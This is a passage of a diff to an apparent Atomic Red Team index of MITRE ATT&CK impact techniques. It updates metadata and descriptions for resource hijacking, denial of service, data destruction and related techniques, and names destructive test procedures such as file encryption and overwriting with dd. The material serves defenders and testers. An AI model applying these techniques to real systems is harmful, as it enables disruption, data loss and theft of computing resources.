+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -69450,11 +70429,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -69477,6 +70455,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -69494,9 +70473,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -69522,9 +70502,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests:
     - name: Change User Password via passwd
@@ -69632,7 +70611,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -69656,7 +70635,6 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests:
     - name: Encrypt files using gpg (FreeBSD/Linux)
@@ -69834,7 +70812,7 @@ impact:
           rm #{encrypted_file_path}
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -69853,7 +70831,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -69870,18 +70847,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -69905,8 +70877,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -69926,33 +70898,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -69963,7 +70924,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -69980,8 +70941,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -70000,39 +70964,14 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests:
     - name: FreeBSD/macOS/Linux - Simulate CPU Load with Yes
@@ -70050,62 +70989,61 @@ impact:
         name: sh
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -70114,7 +71052,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -70140,9 +71078,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -70198,7 +71137,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests:
     - name: FreeBSD/macOS/Linux - Overwrite file with DD
@@ -70226,50 +71164,7 @@ impact:
         name: sh
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -70284,6 +71179,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -70296,16 +71195,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -70373,11 +71308,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
